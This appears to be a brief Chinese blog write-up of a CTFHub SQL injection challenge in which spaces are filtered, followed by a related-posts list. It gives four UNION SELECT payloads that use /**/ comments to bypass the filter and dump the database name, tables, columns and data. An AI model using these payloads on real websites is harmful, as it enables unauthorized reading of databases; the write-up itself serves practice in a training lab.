CTFHUB-SQL注入-过滤空格

燕雀安知鸿鹄之志哉.2024-08-15 10:09

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据

空格被过滤,使用 /**/ 绕过

查询数据库名

复制代码 
-1/**/union/**/select/**/1,database()

查询数据库中的表

复制代码 
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

复制代码 
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

复制代码 
-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg
相关推荐
瀚高PG实验室16 小时前
审计策略修改
网络·数据库·瀚高数据库
黎阳之光17 小时前
黎阳之光:以视频孪生领跑全球,赋能数字孪生水利智能监测新征程
大数据·人工智能·算法·安全·数字孪生
言慢行善17 小时前
sqlserver模糊查询问题
java·数据库·sqlserver
韶博雅17 小时前
emcc24ai
开发语言·数据库·python
有想法的py工程师17 小时前
PostgreSQL 分区表排序优化:Append Sort 优化为 Merge Append
大数据·数据库·postgresql
喵了几个咪17 小时前
如何在 Superset Docker 容器中安装 MySQL 驱动
mysql·docker·容器·superset
迷枫71217 小时前
达梦数据库的体系架构
数据库·oracle·架构
千枫s17 小时前
kali 免杀木马
网络安全
qq_2602412317 小时前
将盾CDN:网络安全态势感知的建设与实践
安全·web安全
夜晚打字声18 小时前
9(九)Jmeter如何连接数据库
数据库·jmeter·oracle
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Oh My Codex 快速使用指南07CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南10实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了